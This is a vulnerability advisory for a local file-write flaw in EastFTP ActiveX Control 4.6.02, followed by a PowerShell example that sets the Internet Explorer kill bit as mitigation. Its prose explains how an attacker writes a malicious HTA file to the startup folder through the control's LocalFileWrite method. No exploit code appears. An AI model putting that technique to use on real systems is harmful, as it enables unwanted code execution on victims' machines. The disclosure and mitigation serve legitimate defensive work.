vendor: EastFTP ActiveX Control
by: Dr_IDE
CVSS: 9,3 (HIGH)
ActiveX Control 0-Day Local Exploit
CWE: 95
Product Name: EastFTP ActiveX Control
Affected Version From: 4.6.02
Affected Version To: 4.6.02
Patch Exists: NO
Related CWE: N/A
CPE: ftpocx.com/download.htm
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009
EastFTP ActiveX Control 0Day
An attacker can exploit this vulnerability by creating a malicious HTA file and using the LocalFileWrite method of the FtpLibrary ActiveX control to write the malicious HTA file to the startup folder of the target system. This will cause the malicious HTA file to be executed when the system is restarted.
Mitigation:
Disable the ActiveX control in the browser or set the kill bit for the vulnerable ActiveX control.
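
One way to apply the kill-bit mitigation from an elevated PowerShell prompt. This is an added example, not part of the original advisory: the function name `Set-ActiveXKillBit` is hypothetical, and the CLSID is a placeholder because the advisory does not list the control's CLSID.

```powershell
# Added example: set the Internet Explorer kill bit for one ActiveX control.
# Run elevated. The CLSID is a PLACEHOLDER; look up the real one under
# HKEY_CLASSES_ROOT\CLSID for the installed control before use.
$PlaceholderClsid = '{00000000-0000-0000-0000-000000000000}'
$KillBit = 0x400   # "Compatibility Flags" bit that stops IE instantiating the control

function Set-ActiveXKillBit {
    param(
        [Parameter(Mandatory)]
        [ValidatePattern('^\{[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$')]
        [string]$Clsid
    )
    if ($Clsid -eq $PlaceholderClsid) {
        throw 'Replace the placeholder CLSID with the CLSID of the control to block.'
    }
    # The 32-bit and 64-bit registry views are separate; set the bit in both.
    $roots = @(
        'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
    )
    foreach ($root in $roots) {
        # WOW6432Node exists only on 64-bit Windows.
        if ($root -like '*WOW6432Node*' -and -not (Test-Path 'HKLM:\SOFTWARE\WOW6432Node')) {
            continue
        }
        $key = Join-Path $root $Clsid
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }

        # Preserve any flags already set and OR in the kill bit.
        $current = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' `
                    -ErrorAction SilentlyContinue).'Compatibility Flags'
        if ($null -eq $current) { $current = 0 }
        $new = $current -bor $KillBit
        New-ItemProperty -Path $key -Name 'Compatibility Flags' `
            -PropertyType DWord -Value $new -Force | Out-Null

        # Read the value back so the result can be audited.
        $check = (Get-ItemProperty -Path $key -Name 'Compatibility Flags').'Compatibility Flags'
        [pscustomobject]@{
            Key        = $key
            Flags      = ('0x{0:X8}' -f $check)
            KillBitSet = (($check -band $KillBit) -eq $KillBit)
        }
    }
}

# Usage (fails until the placeholder is replaced):
# Set-ActiveXKillBit -Clsid $PlaceholderClsid
```

The kill bit only affects hosts that honor it, such as Internet Explorer; unregistering or uninstalling the control removes it for every host.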